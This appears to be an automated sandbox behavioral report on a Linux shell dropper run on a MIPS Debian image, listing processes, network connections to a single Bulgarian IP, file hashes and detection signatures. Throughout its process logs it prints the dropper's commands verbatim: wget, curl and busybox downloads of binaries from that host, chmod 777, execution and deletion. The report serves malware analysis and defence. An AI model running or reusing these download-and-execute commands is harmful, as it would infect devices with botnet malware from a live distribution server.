[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/863-1-0xb6721000-0xb6732044-memory.dmp

memory/869-2-0xb6726000-0xb6737044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 03:36

Reported

2024-11-20 03:39

Platform

debian9-mipsbe-20240611-en

Max time kernel

85s

Max time network

88s

Command Line

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A

Processes

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

